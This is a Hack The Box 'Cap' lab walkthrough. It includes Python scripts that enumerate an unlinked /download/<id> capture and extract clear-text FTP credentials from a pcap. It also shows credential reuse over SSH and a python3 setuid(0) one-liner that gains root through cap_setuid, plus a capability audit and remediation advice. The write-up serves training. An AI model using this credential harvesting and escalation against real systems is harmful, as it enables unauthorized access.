
Hack The Box – Cap Walkthrough

Introduction

This was an easy Linux machine. Initial access required finding clear-text credentials stored in a PCAP file, and privilege escalation to root relied on a Python binary with the cap_setuid capability set.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified port 21 (FTP), port 22 (SSH) and port 80 (HTTP) as open. The next step will be to start enumerating HTTP.

Enumerating HTTP

When accessing the site hosted on port 80, the following page is displayed:

The Security Snapshot page allows downloading PCAP files:

These did not seem to contain useful information. The IP Config page simply runs the ifconfig command, which displays information about network interfaces:

The Network Status page runs the netstat command, showing information about open connections and ports:

When analyzing the request used to download PCAP files from the first page, it appears to perform a GET against the /download endpoint, with the capture to download identified by a number in the path:

http://10.10.10.245/download/[PCAP ID]

The IDs visible in the page start from 1, but the endpoint accepts any number: changing it to "0" returns an additional capture file that the page itself never links to:
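The same probe done systematically, as an added example that is not part of the original walkthrough: request every /download/<id> in a range (including 0 and a few negative values the UI never shows) and keep only responses that start with a capture-file magic, so error pages are not mistaken for captures. The host and endpoint come from the page; the `fetch` callable, the magic check and the constructed `fake_fetch` stand-in are assumptions made so the logic runs offline (pass `http_fetch` against the real box).

```python
"""Probe /download/<id> for capture files the UI never links to.

Added example, not part of the original walkthrough. The endpoint path and the
host come from the page; the `fetch` callable, PCAP magic check and id range
are assumptions so the logic can run offline.
"""
from typing import Callable, Dict, Iterable, Optional
import urllib.error
import urllib.request

BASE_URL = "http://10.10.10.245"

# First four bytes of the capture formats Wireshark opens.
PCAP_MAGICS = {
    b"\xd4\xc3\xb2\xa1",  # classic pcap, little-endian, microsecond timestamps
    b"\xa1\xb2\xc3\xd4",  # classic pcap, big-endian
    b"\x4d\x3c\xb2\xa1",  # classic pcap, little-endian, nanosecond timestamps
    b"\x0a\x0d\x0d\x0a",  # pcapng section header block
}


def http_fetch(url: str, timeout: float = 5.0) -> Optional[bytes]:
    """Fetcher for the real target: body bytes, or None on HTTP/connection errors."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except (urllib.error.URLError, OSError):
        return None


def looks_like_capture(body: bytes) -> bool:
    """Cheap content check: an HTML error page is not a capture file."""
    return body[:4] in PCAP_MAGICS


def enumerate_downloads(ids: Iterable[int],
                        fetch: Callable[[str], Optional[bytes]],
                        base_url: str = BASE_URL) -> Dict[int, bytes]:
    """Request every /download/<id> and keep the ones that are real captures.

    The UI starts numbering at 1, so the interesting ids are the ones it never
    shows; 0 and a couple of negative values are cheap to try.
    """
    found: Dict[int, bytes] = {}
    for i in ids:
        body = fetch(f"{base_url}/download/{i}")
        if body is not None and looks_like_capture(body):
            found[i] = body
    return found


# Constructed stand-in for the box: ids 0 and 1 exist, 2 is missing, 3 returns HTML.
_FAKE_BOX = {
    "/download/0": b"\xd4\xc3\xb2\xa1" + b"\x00" * 20,   # the unlinked capture
    "/download/1": b"\xd4\xc3\xb2\xa1" + b"\x00" * 20,
    "/download/3": b"<html>Not Found</html>",
}


def fake_fetch(url: str) -> Optional[bytes]:
    return _FAKE_BOX.get(url[len(BASE_URL):])


if __name__ == "__main__":
    for pcap_id, body in enumerate_downloads(range(-2, 5), fake_fetch).items():
        print(f"id {pcap_id}: {len(body)} bytes, magic {body[:4].hex()}")
```

Against the real target, `enumerate_downloads(range(-2, 20), http_fetch)` does the same thing; the point of the magic check is that a framework's 404 page is still a 200-byte body and would otherwise look like a hit.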

Analyzing PCAP File

After opening the PCAP file in Wireshark, several packets between 192.168.196.1 and 192.168.196.16 can be found.

The data can now be searched for interesting information by navigating to Edit -> Find Packet and searching for a string:

Searching for the string "password" returns a few results, one of which is in an FTP connection. Since FTP transmits everything, including the login, in clear text, it is worth inspecting; the display filter ftp.request.command == "USER" || ftp.request.command == "PASS" goes straight to the login exchange:

After inspecting the packet, a set of credentials is found:

Since the FTP daemon authenticates against local system accounts, the same credentials can also be used to log into the box via SSH:
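The same extraction done without Wireshark, as an added example that is not part of the original walkthrough: a minimal parser for the classic libpcap container that walks Ethernet/IPv4/TCP headers and pairs each FTP USER command with the PASS that follows on the same client connection. It assumes Ethernet framing (link type 1); the capture bytes are constructed to mirror the page's 192.168.196.1 -> 192.168.196.16 session, with made-up credentials, not the real 0.pcap from the box.

```python
"""Pull FTP USER/PASS commands out of a classic libpcap file without Wireshark.

Added example, not part of the original walkthrough. Assumes Ethernet/IPv4
framing (link type 1); SAMPLE_PCAP below is constructed, with made-up creds.
"""
import socket
import struct
from typing import Iterator, List, Optional, Tuple

PCAP_MAGIC_LE = b"\xd4\xc3\xb2\xa1"   # file written little-endian (the common case)
PCAP_MAGIC_BE = b"\xa1\xb2\xc3\xd4"
LINKTYPE_ETHERNET = 1


def iter_frames(data: bytes) -> Iterator[bytes]:
    """Yield each captured frame: 24-byte global header, then 16-byte record
    headers. pcapng is a different container and is rejected."""
    if data[:4] == PCAP_MAGIC_LE:
        endian = "<"
    elif data[:4] == PCAP_MAGIC_BE:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_segment(frame: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """(src, dst, sport, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":   # EtherType IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[0] >> 4 != 4 or ip[9] != 6:                    # version 4, protocol TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return (socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20]),
            sport, dport, tcp[data_off:])


def ftp_credentials(pcap: bytes, ftp_port: int = 21) -> List[Tuple[str, str, str, str]]:
    """Pair each USER with the PASS that follows on the same client connection.
    Returns (client, server, user, password) tuples."""
    pending = {}      # (client, server, client_port) -> last USER seen
    creds = []
    for frame in iter_frames(pcap):
        seg = tcp_segment(frame)
        if seg is None or seg[3] != ftp_port or not seg[4]:
            continue
        src, dst, sport, _, payload = seg
        key = (src, dst, sport)
        for line in payload.split(b"\r\n"):
            cmd, _, arg = line.partition(b" ")
            if cmd.upper() == b"USER":
                pending[key] = arg.decode("utf-8", "replace")
            elif cmd.upper() == b"PASS":
                creds.append((src, dst, pending.pop(key, "?"), arg.decode("utf-8", "replace")))
    return creds


# --- constructed sample capture (not the real 0.pcap from the box) --------------
def _frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def _pcap(frames: List[bytes]) -> bytes:
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for n, f in enumerate(frames):
        out.append(struct.pack("<IIII", n, 0, len(f), len(f)) + f)
    return b"".join(out)


SAMPLE_PCAP = _pcap([
    _frame("192.168.196.16", "192.168.196.1", 21, 54321, b"220 FTP server ready\r\n"),
    _frame("192.168.196.1", "192.168.196.16", 54321, 21, b"USER demo_user\r\n"),
    _frame("192.168.196.16", "192.168.196.1", 21, 54321, b"331 Please specify the password.\r\n"),
    _frame("192.168.196.1", "192.168.196.16", 54321, 21, b"PASS demo_pass\r\n"),
])

if __name__ == "__main__":
    for client, server, user, pw in ftp_credentials(SAMPLE_PCAP):
        print(f"{client} -> {server}: {user} / {pw}")
```

On a real file, `ftp_credentials(open("0.pcap", "rb").read())` is all that is needed; the function keys on the client's source port so that several logins in one capture are paired correctly rather than mixed up.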

Privilege Escalation

Transferring the LinPEAS enumeration script to the box with Python's built-in HTTP server (python3 -m http.server) on the attacking machine and wget on the target:

Running the script:

It appears the /usr/bin/python3.8 binary has the cap_setuid capability set (this can also be confirmed manually with getcap -r / 2>/dev/null):

Upon consulting GTFOBins, it appears this can be exploited: cap_setuid lets the process change its UID without being root, so the interpreter can call setuid(0) much as a SUID-root binary would:

Running the command mentioned above to gain root-level privileges (python3 resolves to the capable /usr/bin/python3.8 on the box; file capabilities follow the binary, not the name it is invoked by):

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
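As an added example that is not part of the original walkthrough, the two checks behind this step written out: parsing getcap output (both the older "path = caps+ep" and the newer "path caps=ep" syntax) to flag file capabilities that hand out root-equivalent access, and reading CapEff from /proc/self/status to confirm, from inside the interpreter, that CAP_SETUID (bit 7) is actually effective before calling os.setuid(0). The getcap lines and the status text are constructed samples.

```python
"""Spot the CAP_SETUID primitive the way LinPEAS does, from either side of the box.

Added example, not from the original walkthrough. GETCAP_SAMPLE and the
/proc status texts are constructed; CAP_SETUID = 7 is from <linux/capability.h>.
"""
import re
from typing import List, Tuple

CAP_SETUID = 7  # bit index from <linux/capability.h>

# File capabilities that on their own give a local user root-equivalent access.
PRIVESC_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
                "cap_chown", "cap_fowner", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module"}


def parse_getcap_line(line: str) -> Tuple[str, List[str], str]:
    """'/usr/bin/python3.8 = cap_setuid+ep' or '/usr/bin/python3.8 cap_setuid=ep'
    -> ('/usr/bin/python3.8', ['cap_setuid'], 'ep')"""
    line = line.strip()
    if " = " in line:                       # libcap < 2.41 output style
        path, capstr = line.split(" = ", 1)
    else:                                   # libcap >= 2.41 output style
        path, capstr = line.rsplit(None, 1)
    m = re.fullmatch(r"([a-z0-9_,]+)[+=]([eip]*)", capstr)
    if m is None:
        raise ValueError(f"unrecognised capability string: {capstr!r}")
    return path, m.group(1).split(","), m.group(2)


def dangerous_file_caps(getcap_output: str) -> List[Tuple[str, str]]:
    """(path, cap) pairs where a privesc-relevant capability is permitted (p).
    A binary that never calls capset(), like the Python interpreter, also needs
    it effective (e) to use it directly; cap_setuid+ep is the directly usable case."""
    hits = []
    for line in getcap_output.splitlines():
        if not line.strip():
            continue
        path, caps, flags = parse_getcap_line(line)
        if "p" in flags:
            hits.extend((path, c) for c in caps if c in PRIVESC_CAPS)
    return hits


def cap_mask(status_text: str, field: str = "CapEff") -> int:
    """Read one of the Cap* hex masks from /proc/<pid>/status text."""
    m = re.search(rf"^{field}:\s*([0-9a-fA-F]+)\s*$", status_text, re.M)
    if m is None:
        raise ValueError(f"{field} not found")
    return int(m.group(1), 16)


def has_capability(mask: int, cap_bit: int) -> bool:
    return bool((mask >> cap_bit) & 1)


def interpreter_can_setuid() -> bool:
    """Run on the target itself: is CAP_SETUID effective in this process?
    If True, os.setuid(0) from the one-liner above will succeed."""
    with open("/proc/self/status") as f:
        return has_capability(cap_mask(f.read()), CAP_SETUID)


# --- constructed samples --------------------------------------------------------
GETCAP_SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
"""
STATUS_PYTHON38 = "Name:\tpython3.8\nCapPrm:\t0000000000000080\nCapEff:\t0000000000000080\n"
STATUS_PLAIN = "Name:\tbash\nCapPrm:\t0000000000000000\nCapEff:\t0000000000000000\n"

if __name__ == "__main__":
    for path, cap in dangerous_file_caps(GETCAP_SAMPLE):
        print(f"{path}: {cap}")
```

From the defender's side the fix is simply `setcap -r /usr/bin/python3.8`, and `getcap -r / 2>/dev/null` piped through `dangerous_file_caps` is a cheap periodic audit; an interpreter or shell should never carry a file capability, because anything it runs inherits the primitive.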

Conclusion

Although this was a very simple box, it was still a lot of fun. The PCAP analysis in particular is something that isn't seen often in CTFs but is very common in real-life engagements, especially on internal networks still running clear-text protocols such as FTP.